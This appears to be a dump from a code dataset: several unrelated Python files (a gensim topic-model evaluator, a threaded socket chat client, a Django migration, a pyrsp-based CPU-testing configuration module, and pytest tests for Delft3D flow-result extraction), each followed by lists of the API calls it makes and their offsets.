`data` and optionally a list of varying parameters `varying_parameters`. Pass parameters in `constant_parameters`
dict to each model calculation. Use at maximum `n_max_processes` processors or use all available processors if None
is passed.
`data` can be either a Document-Term-Matrix (NumPy array/matrix, SciPy sparse matrix) or a dict with document ID ->
    Document-Term-Matrix mapping when calculating models for multiple corpora (i.e. multiple named documents).
If `data` is a dict of named documents, this function will return a dict with document ID -> result list. Otherwise
it will only return a result list. A result list always is a list containing tuples `(parameter_set, model)` where
`parameter_set` is a dict of the used parameters.
"""
mp_models = MultiprocModelsRunner(MultiprocModelsWorkerGensim, data, varying_parameters, constant_parameters,
n_max_processes=n_max_processes)
return mp_models.run()
def evaluate_topic_models(data, varying_parameters, constant_parameters=None, n_max_processes=None, return_models=False,
metric=None, **metric_kwargs):
"""
Compute several Topic Models in parallel using the "gensim" package. Calculate the models using a list of varying
parameters `varying_parameters` on a single Document-Term-Matrix `data`. Pass parameters in `constant_parameters`
dict to each model calculation. Use at maximum `n_max_processes` processors or use all available processors if None
is passed.
`data` must be a Document-Term-Matrix (NumPy array/matrix, SciPy sparse matrix).
Will return a list of size `len(varying_parameters)` containing tuples `(parameter_set, eval_results)` where
`parameter_set` is a dict of the used parameters and `eval_results` is a dict of metric names -> metric results.
"""
mp_eval = MultiprocEvaluationRunner(MultiprocEvaluationWorkerGensim, AVAILABLE_METRICS, data,
varying_parameters, constant_parameters,
metric=metric, metric_options=metric_kwargs,
n_max_processes=n_max_processes, return_models=return_models)
return mp_eval.run()
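# --- Hypothetical usage sketch (not part of the original module) ---
# Evaluates LDA models for a few topic counts on a random sparse document-term
# matrix. The parameter names ('num_topics', 'passes') are standard gensim
# LdaModel arguments; the matrix shape, topic counts and the tuple-of-metrics
# form of `metric` are illustrative assumptions.
if __name__ == '__main__':
    from scipy import sparse
    dtm = sparse.csr_matrix(np.random.randint(0, 5, size=(100, 500)))  # 100 docs, 500 terms
    varying = [{'num_topics': k} for k in (5, 10, 20)]
    eval_results = evaluate_topic_models(dtm, varying,
                                          constant_parameters={'passes': 2},
                                          metric=('perplexity', 'cao_juan_2009'))
    for params, res in eval_results:
        print(params, res)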
|
[
"numpy.exp2",
"gensim.models.ldamodel.LdaModel",
"logging.getLogger"
] |
[((393, 423), 'logging.getLogger', 'logging.getLogger', (['"""tmtoolkit"""'], {}), "('tmtoolkit')\n", (410, 423), False, 'import logging\n'), ((630, 652), 'numpy.exp2', 'np.exp2', (['(-perwordbound)'], {}), '(-perwordbound)\n', (637, 652), True, 'import numpy as np\n'), ((869, 916), 'gensim.models.ldamodel.LdaModel', 'gensim.models.ldamodel.LdaModel', (['data'], {}), '(data, **params)\n', (900, 916), False, 'import gensim\n')]
|
# -*- coding: utf-8 -*-
import queue
import select
import signal
import socket
import sys
import threading
class Client:
def __init__(self, host, port, sq, rq):
self._host = host
self._port = port
self._connect()
self._send_q = sq
self._recv_q = rq
if sys.platform == "linux":
signal.signal(signal.SIGUSR2, self._handler)
self._connected = threading.Event()
self._client_thread = threading.Thread(target=self._receive_data)
self._connected.set()
self._client_thread.start()
def _handler(self, signum, frame):
self._connected.clear()
    def _connect(self):
        for addrinfo in socket.getaddrinfo(self._host, self._port, socket.AF_UNSPEC, socket.SOCK_STREAM):
            ai_family, sock_type, _, _, sock_addr = addrinfo
            try:
                sock = socket.socket(ai_family, sock_type)
            except socket.error as ex:
                print("(!) sock: %s\n" % ex)
                continue  # socket creation failed, try the next address
            try:
                sock.connect(sock_addr)
            except socket.error as ex:
                print("(!) connect: %s\n" % ex)
                sock.close()
                continue  # connection failed, try the next address
            sock.setblocking(False)
            if self._host != sock_addr[0]:
                print("(+) Connected to %s(%s):%d\n" %
                      (self._host, sock_addr[0], self._port))
            else:
                print("(+) Connected to %s:%d\n" % (self._host, self._port))
            self._sock = sock
            return  # connected, stop trying further addresses
        print("(!) Could not connect to %s:%d\n" % (self._host, self._port))
        exit(1)
    def _sending_data_process(self, code, data):
        try:
            buf = code + " " + data + "\n"
            self._sock.sendall(buf.encode())
        except Exception as ex:
            print("(!) sending data process: %s\n" % ex)
    def _receive_data(self):
        while self._connected.is_set():
            try:
                readable, _, _ = select.select([self._sock], [], [], 0.05)
                for s in readable:
                    buf = s.recv(10240)
                    if len(buf) == 0:
                        # an empty read means the server closed the connection
                        self._connected.clear()
                        break
                    self._received_data_process(buf)
                if not self._send_q.empty():
                    d = self._send_q.get()
                    if d[0] == "QUT":
                        self._connected.clear()
                    self._sending_data_process(d[0], d[1])
            except select.error as ex:
                print("(!) select: %s\n" % ex)
        self._sending_data_process("QUT", "")
        self._connected.clear()
        self._recv_q.put("EXT")
        print("(*) Disconnecting from server...\n")
        self._sock.close()
        print("(-) Disconnected\n")
    def _received_data_process(self, data):
try:
# print("#DEBUG Client# - ", data)
data = data.decode().splitlines()
for buf in data:
buf = buf.strip().split(" ")
if buf[0] == "ERR":
if "FULL" in buf[1]:
print("Server full, closing connection with server !\n")
if "UNAVAILABLE" in buf[1]:
print("Nickname unavailable\n")
self._connected.clear()
else:
self._recv_q.put(buf)
except Exception as ex:
print("(!) received data process: %s\n" % ex)
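# --- Hypothetical usage sketch (not part of the original module) ---
# Assumes a matching server is listening and that "NCK"/"QUT" are valid codes
# of the (unspecified) "<CODE> <payload>\n" wire protocol:
#
#     if __name__ == "__main__":
#         sq, rq = queue.Queue(), queue.Queue()
#         client = Client("localhost", 9999, sq, rq)
#         sq.put(("NCK", "alice"))   # queue an outgoing message
#         sq.put(("QUT", ""))        # ask the receive thread to disconnect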
|
[
"threading.Thread",
"socket.socket",
"socket.getaddrinfo",
"select.select",
"threading.Event",
"signal.signal"
] |
[((440, 457), 'threading.Event', 'threading.Event', ([], {}), '()\n', (455, 457), False, 'import threading\n'), ((489, 532), 'threading.Thread', 'threading.Thread', ([], {'target': 'self._receive_data'}), '(target=self._receive_data)\n', (505, 532), False, 'import threading\n'), ((728, 813), 'socket.getaddrinfo', 'socket.getaddrinfo', (['self._host', 'self._port', 'socket.AF_UNSPEC', 'socket.SOCK_STREAM'], {}), '(self._host, self._port, socket.AF_UNSPEC, socket.SOCK_STREAM\n )\n', (746, 813), False, 'import socket\n'), ((366, 410), 'signal.signal', 'signal.signal', (['signal.SIGUSR2', 'self._handler'], {}), '(signal.SIGUSR2, self._handler)\n', (379, 410), False, 'import signal\n'), ((916, 951), 'socket.socket', 'socket.socket', (['ai_family', 'sock_type'], {}), '(ai_family, sock_type)\n', (929, 951), False, 'import socket\n'), ((1998, 2039), 'select.select', 'select.select', (['[self._sock]', '[]', '[]', '(0.05)'], {}), '([self._sock], [], [], 0.05)\n', (2011, 2039), False, 'import select\n')]
|
# Generated by Django 2.2.10 on 2020-03-07 07:54
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('anijung', '0002_quote'),
]
operations = [
migrations.AlterField(
model_name='quote',
name='case',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='anijung.Case'),
),
]
|
[
"django.db.models.ForeignKey"
] |
[((354, 463), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'blank': '(True)', 'null': '(True)', 'on_delete': 'django.db.models.deletion.CASCADE', 'to': '"""anijung.Case"""'}), "(blank=True, null=True, on_delete=django.db.models.\n deletion.CASCADE, to='anijung.Case')\n", (371, 463), False, 'from django.db import migrations, models\n')]
|
__all__ = [
"C2TConfig"
, "Run"
, "get_new_rsp"
, "DebugClient"
, "DebugServer"
, "TestBuilder"
]
from collections import (
namedtuple
)
from common import (
pypath
)
with pypath("..pyrsp"):
from pyrsp.rsp import (
RSP,
archmap
)
# CPU Testing Tool configuration components
C2TConfig = namedtuple(
"C2TConfig",
"rsp_target qemu gdbserver target_compiler oracle_compiler"
)
Run = namedtuple(
"Run",
"executable args"
)
def get_new_rsp(regs, pc, regsize, little_endian = True):
class CustomRSP(RSP):
def __init__(self, *a, **kw):
self.arch = dict(
regs = regs,
endian = little_endian,
bitsize = regsize
)
self.pc_reg = pc
super(CustomRSP, self).__init__(*a, **kw)
return CustomRSP
class DebugClient(object):
def __init__(self, march, new_rsp = None, user = False, sp = None,
qemu_reset = False, test_timeout = 10.0
):
self.march = march
if march in archmap:
self.rsp = archmap[march]
elif new_rsp is not None:
self.rsp = new_rsp
else:
self.rsp = None
self.user = user
self.sp = sp
self.qemu_reset = qemu_reset
self.test_timeout = test_timeout
class DebugServer(object):
def __init__(self, run):
self.run = run
@property
def run_script(self):
return ' '.join(self.run)
class TestBuilder(tuple):
def __new__(cls, *runs):
return tuple.__new__(cls, runs)
# TODO: how to operate without runs?
@property
def run_script(self):
for run in self:
yield ' '.join(run)
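# --- Hypothetical usage sketch (not part of the original module) ---
# Register names, the stack pointer, the port and the binary are illustrative
# assumptions:
#
#     CustomRSP = get_new_rsp(
#         regs = ["r%d" % i for i in range(13)] + ["sp", "lr", "pc"],
#         pc = "pc",
#         regsize = 32
#     )
#     client = DebugClient("myarch", new_rsp = CustomRSP, sp = "sp")
#     server = DebugServer(Run("qemu-system-arm", "-S -gdb tcp::1234"))
#     print(server.run_script)   # -> "qemu-system-arm -S -gdb tcp::1234"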
|
[
"common.pypath",
"collections.namedtuple"
] |
[((334, 422), 'collections.namedtuple', 'namedtuple', (['"""C2TConfig"""', '"""rsp_target qemu gdbserver target_compiler oracle_compiler"""'], {}), "('C2TConfig',\n 'rsp_target qemu gdbserver target_compiler oracle_compiler')\n", (344, 422), False, 'from collections import namedtuple\n'), ((435, 471), 'collections.namedtuple', 'namedtuple', (['"""Run"""', '"""executable args"""'], {}), "('Run', 'executable args')\n", (445, 471), False, 'from collections import namedtuple\n'), ((195, 212), 'common.pypath', 'pypath', (['"""..pyrsp"""'], {}), "('..pyrsp')\n", (201, 212), False, 'from common import pypath\n')]
|
# -*- coding: utf-8 -*-
import warnings
import numpy as np
import pandas as pd
import pytest
with warnings.catch_warnings():
warnings.filterwarnings("ignore", category=DeprecationWarning)
import xarray as xr
from snl_d3d_cec_verify.cases import CaseStudy
from snl_d3d_cec_verify.result.faces import (_check_case_study,
_faces_frame_to_slice,
_faces_frame_to_depth,
_map_to_faces_frame_with_tke,
_map_to_faces_frame,
_get_quadrilateral_centre,
_FMFaces,
_trim_to_faces_frame,
_StructuredFaces)
def test_check_case_study_error():
case = CaseStudy(dx=[1, 2, 3])
with pytest.raises(ValueError) as excinfo:
_check_case_study(case)
assert "case study must have length one" in str(excinfo)
@pytest.fixture
def faces_frame_fm(data_dir):
csv_path = data_dir / "output" / "faces_frame_fm.csv"
frame = pd.read_csv(csv_path, parse_dates=["time"])
times = frame.time.unique()
return frame[frame.time == times[-1]]
@pytest.fixture
def faces_frame_structured(data_dir):
csv_path = data_dir / "output" / "faces_frame_structured.csv"
frame = pd.read_csv(csv_path, parse_dates=["time"])
times = frame.time.unique()
return frame[frame.time == times[-1]]
def test_faces_frame_to_slice_sigma(faces_frame_fm):
ts = pd.Timestamp("2001-01-01 01:00:00")
sigma = -0.5
ds = _faces_frame_to_slice(faces_frame_fm, ts, "sigma", sigma)
assert isinstance(ds, xr.Dataset)
assert len(ds["$x$"]) == 18
assert len(ds["$y$"]) == 4
assert np.isclose(ds["$x$"].min(), 0.5)
assert np.isclose(ds["$x$"].max(), 17.5)
assert np.isclose(ds["$y$"].min(), 1.5)
assert np.isclose(ds["$y$"].max(), 4.5)
assert ds[r"$\sigma$"].values.take(0) == sigma
assert ds.time.values.take(0) == ts
assert ds["$z$"].min() > -1.0012
assert ds["$z$"].max() < -1
# Same bounds as the frame
assert ds["$u$"].min() >= faces_frame_fm["u"].min()
assert ds["$u$"].max() <= faces_frame_fm["u"].max()
assert ds["$v$"].min() >= faces_frame_fm["v"].min()
assert ds["$v$"].max() <= faces_frame_fm["v"].max()
assert ds["$w$"].min() >= faces_frame_fm["w"].min()
assert ds["$w$"].max() <= faces_frame_fm["w"].max()
def test_faces_frame_structured_to_slice_sigma(faces_frame_structured):
ts = pd.Timestamp("2001-01-01 01:00:00")
sigma = -0.75
ds = _faces_frame_to_slice(faces_frame_structured, ts, "sigma", sigma)
assert isinstance(ds, xr.Dataset)
assert len(ds["$x$"]) == 18
assert len(ds["$y$"]) == 4
assert np.isclose(ds["$x$"].min(), 0.5)
assert np.isclose(ds["$x$"].max(), 17.5)
assert np.isclose(ds["$y$"].min(), 1.5)
assert np.isclose(ds["$y$"].max(), 4.5)
assert ds[r"$\sigma$"].values.take(0) == sigma
assert ds.time.values.take(0) == ts
assert ds["$z$"].min() > -1.504
assert ds["$z$"].max() < -1.5
# Same bounds as the frame
assert ds["$u$"].min() >= faces_frame_structured["u"].min()
assert ds["$u$"].max() <= faces_frame_structured["u"].max()
assert ds["$v$"].min() >= faces_frame_structured["v"].min()
assert ds["$v$"].max() <= faces_frame_structured["v"].max()
assert ds["$w$"].min() >= faces_frame_structured["w"].min()
assert ds["$w$"].max() <= faces_frame_structured["w"].max()
assert ds["$k$"].min() >= 0
assert ds["$k$"].min() >= faces_frame_structured["tke"].min()
assert ds["$k$"].max() <= faces_frame_structured["tke"].max()
def test_faces_frame_to_slice_sigma_extrapolate_forward(faces_frame_fm):
ts = pd.Timestamp("2001-01-01 01:00:00")
sigma = 0.1
ds = _faces_frame_to_slice(faces_frame_fm, ts, "sigma", sigma)
assert ds["$z$"].min() > 0.2
assert ds["$z$"].max() < 0.2003
def test_faces_frame_to_slice_sigma_extrapolate_backward(faces_frame_fm):
ts = pd.Timestamp("2001-01-01 01:00:00")
sigma = -1.1
ds = _faces_frame_to_slice(faces_frame_fm, ts, "sigma", sigma)
assert ds["$z$"].min() > -2.203
assert ds["$z$"].max() < -2.2
def test_faces_frame_to_slice_z(faces_frame_fm):
ts = pd.Timestamp("2001-01-01 01:00:00")
z = -1
ds = _faces_frame_to_slice(faces_frame_fm, ts, "z", z)
assert isinstance(ds, xr.Dataset)
assert len(ds["$x$"]) == 18
assert len(ds["$y$"]) == 4
assert np.isclose(ds["$x$"].min(), 0.5)
assert np.isclose(ds["$x$"].max(), 17.5)
assert np.isclose(ds["$y$"].min(), 1.5)
assert np.isclose(ds["$y$"].max(), 4.5)
assert ds["$z$"].values.take(0) == z
assert ds.time.values.take(0) == ts
assert ds[r"$\sigma$"].values.min() >= -1
assert ds["$z$"].max() < 1.002
# Same bounds as the frame
assert ds["$u$"].min() >= faces_frame_fm["u"].min()
assert ds["$u$"].max() <= faces_frame_fm["u"].max()
assert ds["$v$"].min() >= faces_frame_fm["v"].min()
assert ds["$v$"].max() <= faces_frame_fm["v"].max()
assert ds["$w$"].min() >= faces_frame_fm["w"].min()
assert ds["$w$"].max() <= faces_frame_fm["w"].max()
def test_faces_frame_to_slice_error():
with pytest.raises(RuntimeError) as excinfo:
_faces_frame_to_slice("mock", "mock", "mock", "mock")
assert "Given key is not valid" in str(excinfo)
def test_faces_frame_to_depth(faces_frame_fm):
ts = pd.Timestamp("2001-01-01 01:00:00")
da = _faces_frame_to_depth(faces_frame_fm, ts)
assert isinstance(da, xr.DataArray)
assert len(da["$x$"]) == 18
assert len(da["$y$"]) == 4
assert da.time.values.take(0) == ts
# Same bounds as the frame
assert da.min() >= faces_frame_fm["depth"].min()
assert da.max() <= faces_frame_fm["depth"].max()
def test_faces_frame_structured_to_depth(faces_frame_structured):
ts = pd.Timestamp("2001-01-01 01:00:00")
da = _faces_frame_to_depth(faces_frame_structured, ts)
assert isinstance(da, xr.DataArray)
assert len(da["$x$"]) == 18
assert len(da["$y$"]) == 4
assert da.time.values.take(0) == ts
# Same bounds as the frame
assert da.min() >= faces_frame_structured["depth"].min()
assert da.max() <= faces_frame_structured["depth"].max()
def test_faces_load_t_step_first(faces):
t_step = -1
expected_t_step = faces._resolve_t_step(t_step)
faces._load_t_step(t_step)
assert len(faces._frame) == 18 * 4 * 7
assert expected_t_step in faces._t_steps
assert faces._t_steps[expected_t_step] == \
pd.Timestamp('2001-01-01 01:00:00')
def test_faces_load_t_step_second(faces):
faces._load_t_step(-1)
faces._load_t_step(0)
assert len(faces._frame) == 18 * 4 * 7 * 2
assert len(faces._t_steps) == 2
assert set(faces._frame["time"]) == set([
pd.Timestamp('2001-01-01 01:00:00'),
pd.Timestamp('2001-01-01')])
def test_faces_load_t_step_no_repeat(faces):
faces._load_t_step(-1)
faces._load_t_step(1)
assert len(faces._frame) == 18 * 4 * 7
assert len(faces._t_steps) == 1
def test_faces_extract_depth(mocker, faces):
mock = mocker.patch('snl_d3d_cec_verify.result.faces.'
'_faces_frame_to_depth')
faces.extract_depth(-1)
mock.assert_called()
def test_faces_extract_sigma(mocker, faces):
mock = mocker.patch('snl_d3d_cec_verify.result.faces.'
'_faces_frame_to_slice')
faces.extract_sigma(-1, 0)
mock.assert_called()
assert 'sigma' in mock.call_args.args[2]
def test_faces_extract_sigma_interp(faces):
t_step = -1
sigma = -0.5
x = 1
y = 3
ds = faces.extract_sigma(t_step, sigma, x, y)
t_step = faces._resolve_t_step(t_step)
ts = faces._t_steps[t_step]
assert isinstance(ds, xr.Dataset)
assert ds[r"$\sigma$"].values.take(0) == sigma
assert ds.time.values.take(0) == ts
assert ds["$x$"].values.take(0) == x
assert ds["$y$"].values.take(0) == y
assert np.isclose(ds["$z$"].values, -1.00114767)
# Same bounds as the frame
assert (faces._frame["u"].min() <= ds["$u$"].values.take(0) <=
faces._frame["u"].max())
assert (faces._frame["v"].min() <= ds["$v$"].values.take(0) <=
faces._frame["v"].max())
assert (faces._frame["w"].min() <= ds["$w$"].values.take(0) <=
faces._frame["w"].max())
def test_faces_extract_z(mocker, faces):
mock = mocker.patch('snl_d3d_cec_verify.result.faces.'
'_faces_frame_to_slice')
faces.extract_z(-1, -1)
mock.assert_called()
assert 'z' in mock.call_args.args[2]
def test_faces_extract_z_interp(faces):
t_step = -1
z = -1
x = 1
y = 3
ds = faces.extract_z(t_step, z, x, y)
t_step = faces._resolve_t_step(t_step)
ts = faces._t_steps[t_step]
assert isinstance(ds, xr.Dataset)
assert ds["$z$"].values.take(0) == z
assert ds.time.values.take(0) == ts
assert ds["$x$"].values.take(0) == x
assert ds["$y$"].values.take(0) == y
assert np.isclose(ds[r"$\sigma$"].values, -0.49942682)
# Same bounds as the frame
assert (faces._frame["u"].min() <= ds["$u$"].values.take(0) <=
faces._frame["u"].max())
assert (faces._frame["v"].min() <= ds["$v$"].values.take(0) <=
faces._frame["v"].max())
assert (faces._frame["w"].min() <= ds["$w$"].values.take(0) <=
faces._frame["w"].max())
@pytest.mark.parametrize("x, y", [
("mock", None),
(None, "mock")])
def test_faces_extract_interp_error(faces, x, y):
with pytest.raises(RuntimeError) as excinfo:
faces.extract_z("mock", "mock", x, y)
assert "x and y must both be set" in str(excinfo)
def test_faces_extract_turbine_z(mocker, faces):
case = CaseStudy()
offset_z = 0.5
t_step = -1
mock = mocker.patch.object(faces, 'extract_z')
faces.extract_turbine_z(t_step, case, offset_z)
mock.assert_called_with(t_step, case.turb_pos_z + offset_z)
def test_faces_extract_turbine_centreline(mocker, faces):
case = CaseStudy()
t_step = -1
x_step = 0.5
offset_x = 0.5
offset_y = 0.5
offset_z = 0.5
mock = mocker.patch.object(faces, 'extract_z')
faces.extract_turbine_centreline(t_step,
case,
x_step,
offset_x,
offset_y,
offset_z)
mock.assert_called()
assert mock.call_args.args[0] == t_step
assert mock.call_args.args[1] == case.turb_pos_z + offset_z
x = mock.call_args.args[2]
y = mock.call_args.args[3]
assert min(x) == case.turb_pos_x + offset_x
assert max(x) <= faces.xmax
assert np.unique(np.diff(x)).take(0) == x_step
assert set(y) == set([case.turb_pos_y + offset_y])
def test_faces_extract_turbine_centre(mocker, faces):
case = CaseStudy()
t_step = -1
offset_x = 0.5
offset_y = 0.5
offset_z = 0.5
mock = mocker.patch.object(faces, 'extract_z')
faces.extract_turbine_centre(t_step,
case,
offset_x,
offset_y,
offset_z)
mock.assert_called()
assert mock.call_args.args[0] == t_step
assert mock.call_args.args[1] == case.turb_pos_z + offset_z
x = mock.call_args.args[2]
y = mock.call_args.args[3]
assert len(x) == 1
assert len(y) == 1
assert x[0] == case.turb_pos_x + offset_x
assert y[0] == case.turb_pos_y + offset_y
def test_map_to_faces_frame_with_tke(data_dir):
map_path = data_dir / "output" / "FlowFM_map.nc"
faces_frame = _map_to_faces_frame_with_tke(map_path, -1)
assert isinstance(faces_frame, pd.DataFrame)
assert len(faces_frame) == 18 * 4 * 7
assert faces_frame.columns.to_list() == ["x",
"y",
"z",
"sigma",
"time",
"depth",
"u",
"v",
"w",
"tke"]
assert np.isclose(faces_frame["x"].min(), 0.5)
assert np.isclose(faces_frame["x"].max(), 17.5)
assert np.isclose(faces_frame["y"].min(), 1.5)
assert np.isclose(faces_frame["y"].max(), 4.5)
assert -2.003 < faces_frame["z"].min() < -4 / 3
assert -2 / 3 < faces_frame["z"].max() <= 0
assert np.isclose(faces_frame["sigma"].unique(),
[-1.,
-0.83333333,
-0.66666667,
-0.5,
-0.33333333,
-0.16666667,
0.]).all()
assert set(faces_frame["time"]) == set([
pd.Timestamp('2001-01-01 01:00:00')])
assert faces_frame["depth"].min() > 2
assert faces_frame["depth"].max() < 2.003
assert faces_frame["u"].min() > 0.57
assert faces_frame["u"].max() < 0.9
assert faces_frame["v"].min() > -1e-15
assert faces_frame["v"].max() < 1e-15
assert faces_frame["w"].min() > -0.02
assert faces_frame["w"].max() < 0.02
assert faces_frame["tke"].min() > 0
assert faces_frame["tke"].max() < 0.0089
sigma_slice = _faces_frame_to_slice(faces_frame,
pd.Timestamp('2001-01-01 01:00:00'),
"sigma",
-0.75)
assert np.isclose(sigma_slice["$z$"].values.mean(), -1.5009617997833038)
assert round(sigma_slice["$k$"].values.mean(), 5) == 0.00627
def test_map_to_faces_frame_with_tke_none(data_dir):
map_path = data_dir / "output" / "FlowFM_map.nc"
faces_frame = _map_to_faces_frame_with_tke(map_path)
assert isinstance(faces_frame, pd.DataFrame)
assert len(faces_frame) == 18 * 4 * 7 * 2
assert faces_frame.columns.to_list() == ["x",
"y",
"z",
"sigma",
"time",
"depth",
"u",
"v",
"w",
"tke"]
assert np.isclose(faces_frame["x"].min(), 0.5)
assert np.isclose(faces_frame["x"].max(), 17.5)
assert np.isclose(faces_frame["y"].min(), 1.5)
assert np.isclose(faces_frame["y"].max(), 4.5)
assert -2.003 < faces_frame["z"].min() < -4 / 3
assert -2 / 3 < faces_frame["z"].max() <= 0
assert np.isclose(faces_frame["sigma"].unique(),
[-1.,
-0.83333333,
-0.66666667,
-0.5,
-0.33333333,
-0.16666667,
0.]).all()
assert set(faces_frame["time"]) == set([
pd.Timestamp('2001-01-01 00:00:00'),
pd.Timestamp('2001-01-01 01:00:00')])
assert faces_frame["depth"].min() > 1.998
assert faces_frame["depth"].max() < 2.003
assert faces_frame["u"].min() >= 0
assert faces_frame["u"].max() < 0.9
assert faces_frame["v"].min() > -1e-15
assert faces_frame["v"].max() < 1e-15
assert faces_frame["w"].min() > -0.02
assert faces_frame["w"].max() < 0.02
assert faces_frame["tke"].min() > 0
assert faces_frame["tke"].max() < 0.0089
def test_map_to_faces_frame(data_dir):
map_path = data_dir / "output" / "FlowFM_map.nc"
faces_frame = _map_to_faces_frame(map_path, -1)
assert isinstance(faces_frame, pd.DataFrame)
assert len(faces_frame) == 216
assert faces_frame.columns.to_list() == ["x",
"y",
"z",
"sigma",
"time",
"depth",
"u",
"v",
"w"]
assert np.isclose(faces_frame["x"].min(), 0.5)
assert np.isclose(faces_frame["x"].max(), 17.5)
assert np.isclose(faces_frame["y"].min(), 1.5)
assert np.isclose(faces_frame["y"].max(), 4.5)
assert -2 < faces_frame["z"].min() < -4 / 3
assert -2 / 3 < faces_frame["z"].max() < 0
assert (faces_frame["sigma"].unique() == (-0.8333333333333334,
-0.5,
-0.16666666666666669)).all()
assert set(faces_frame["time"]) == set([
pd.Timestamp('2001-01-01 01:00:00')])
assert faces_frame["depth"].min() > 2
assert faces_frame["depth"].max() < 2.003
assert faces_frame["u"].min() > 0.6
assert faces_frame["u"].max() < 0.9
assert faces_frame["v"].min() > -1e-15
assert faces_frame["v"].max() < 1e-15
assert faces_frame["w"].min() > -0.02
assert faces_frame["w"].max() < 0.02
sigma_slice = _faces_frame_to_slice(faces_frame,
pd.Timestamp('2001-01-01 01:00:00'),
"sigma",
-0.75)
assert np.isclose(sigma_slice["$z$"].values.mean(), -1.5009617997833038)
def test_map_to_faces_frame_none(data_dir):
map_path = data_dir / "output" / "FlowFM_map.nc"
faces_frame = _map_to_faces_frame(map_path)
assert isinstance(faces_frame, pd.DataFrame)
assert len(faces_frame) == 432
assert faces_frame.columns.to_list() == ["x",
"y",
"z",
"sigma",
"time",
"depth",
"u",
"v",
"w"]
assert np.isclose(faces_frame["x"].min(), 0.5)
assert np.isclose(faces_frame["x"].max(), 17.5)
assert np.isclose(faces_frame["y"].min(), 1.5)
assert np.isclose(faces_frame["y"].max(), 4.5)
assert -2 < faces_frame["z"].min() < -4 / 3
assert -2 / 3 < faces_frame["z"].max() < 0
assert (faces_frame["sigma"].unique() == (-0.8333333333333334,
-0.5,
-0.16666666666666669)).all()
assert set(faces_frame["time"]) == set([
pd.Timestamp('2001-01-01 00:00:00'),
pd.Timestamp('2001-01-01 01:00:00')])
assert faces_frame["depth"].min() >= 2
assert faces_frame["depth"].max() < 2.003
assert faces_frame["u"].min() >= 0.
assert faces_frame["u"].max() < 0.9
assert faces_frame["v"].min() > -1e-15
assert faces_frame["v"].max() < 1e-15
assert faces_frame["w"].min() > -0.02
assert faces_frame["w"].max() < 0.02
def test_get_quadrilateral_centre():
densities = np.array([0, 0, 1, 1])
result = _get_quadrilateral_centre(densities)
assert result == 0.5
def test_FMFaces(mocker):
mock = mocker.patch(
'snl_d3d_cec_verify.result.faces._map_to_faces_frame_with_tke',
autospec=True)
path = "mock"
tstep = 0
test = _FMFaces(path, 2, 18)
test._get_faces_frame(tstep)
mock.assert_called_with(path, tstep)
def test_trim_to_faces_frame(data_dir):
trim_path = data_dir / "output" / "trim-D3D.nc"
faces_frame = _trim_to_faces_frame(trim_path, -1)
assert isinstance(faces_frame, pd.DataFrame)
assert len(faces_frame) == 216
assert faces_frame.columns.to_list() == ["x",
"y",
"z",
"sigma",
"time",
"depth",
"u",
"v",
"w",
"tke"]
assert np.isclose(faces_frame["x"].min(), 0.5)
assert np.isclose(faces_frame["x"].max(), 17.5)
assert np.isclose(faces_frame["y"].min(), 1.5)
assert np.isclose(faces_frame["y"].max(), 4.5)
assert -2 < faces_frame["z"].min() < -4 / 3
assert -2 / 3 < faces_frame["z"].max() < 0
assert np.isclose(faces_frame["sigma"].unique(),
(-0.16666667, -0.5, -0.83333331)).all()
assert set(faces_frame["time"]) == set([
pd.Timestamp('2001-01-01 01:00:00')])
assert faces_frame["depth"].min() > 2
assert faces_frame["depth"].max() < 2.005
assert faces_frame["u"].min() > 0.6
assert faces_frame["u"].max() < 0.9
assert faces_frame["v"].min() > -1e-2
assert faces_frame["v"].max() < 1e-2
assert faces_frame["w"].min() > -0.03
assert faces_frame["w"].max() < 0.02
assert faces_frame["tke"].min() > 0
assert faces_frame["tke"].max() < 0.004
def test_trim_to_faces_frame_none(data_dir):
trim_path = data_dir / "output" / "trim-D3D.nc"
faces_frame = _trim_to_faces_frame(trim_path)
assert isinstance(faces_frame, pd.DataFrame)
assert len(faces_frame) == 432
assert faces_frame.columns.to_list() == ["x",
"y",
"z",
"sigma",
"time",
"depth",
"u",
"v",
"w",
"tke"]
assert np.isclose(faces_frame["x"].min(), 0.5)
assert np.isclose(faces_frame["x"].max(), 17.5)
assert np.isclose(faces_frame["y"].min(), 1.5)
assert np.isclose(faces_frame["y"].max(), 4.5)
assert -2 < faces_frame["z"].min() < -4 / 3
assert -2 / 3 < faces_frame["z"].max() < 0
assert np.isclose(faces_frame["sigma"].unique(),
(-0.16666667, -0.5, -0.83333331)).all()
assert set(faces_frame["time"]) == set([
pd.Timestamp('2001-01-01 00:00:00'),
pd.Timestamp('2001-01-01 01:00:00')])
assert faces_frame["depth"].min() >= 2
assert faces_frame["depth"].max() < 2.005
assert faces_frame["u"].min() >= 0.
assert faces_frame["u"].max() < 0.9
assert faces_frame["v"].min() > -1e-2
assert faces_frame["v"].max() < 1e-2
assert faces_frame["w"].min() > -0.03
assert faces_frame["w"].max() < 0.02
assert faces_frame["tke"].min() > 0
assert faces_frame["tke"].max() < 0.004
def test_StructuredFaces(mocker):
mock = mocker.patch('snl_d3d_cec_verify.result.faces._trim_to_faces_frame',
autospec=True)
path = "mock"
tstep = 0
test = _StructuredFaces(path, 2, 18)
test._get_faces_frame(tstep)
mock.assert_called_with(path, tstep)
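# --- Hypothetical invocation sketch (not part of the original test module) ---
# Assumes the `data_dir` and `faces` fixtures live in a conftest.py and that
# pytest-mock provides the `mocker` fixture:
#   pytest test_faces.py -k "sigma or depth" -v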
|
[
"snl_d3d_cec_verify.result.faces._get_quadrilateral_centre",
"pandas.read_csv",
"numpy.isclose",
"snl_d3d_cec_verify.result.faces._faces_frame_to_slice",
"snl_d3d_cec_verify.result.faces._trim_to_faces_frame",
"pytest.mark.parametrize",
"pytest.raises",
"warnings.catch_warnings",
"snl_d3d_cec_verify.result.faces._FMFaces",
"snl_d3d_cec_verify.result.faces._check_case_study",
"snl_d3d_cec_verify.result.faces._map_to_faces_frame_with_tke",
"snl_d3d_cec_verify.result.faces._faces_frame_to_depth",
"snl_d3d_cec_verify.cases.CaseStudy",
"pandas.Timestamp",
"warnings.filterwarnings",
"numpy.diff",
"numpy.array",
"snl_d3d_cec_verify.result.faces._StructuredFaces",
"snl_d3d_cec_verify.result.faces._map_to_faces_frame"
] |
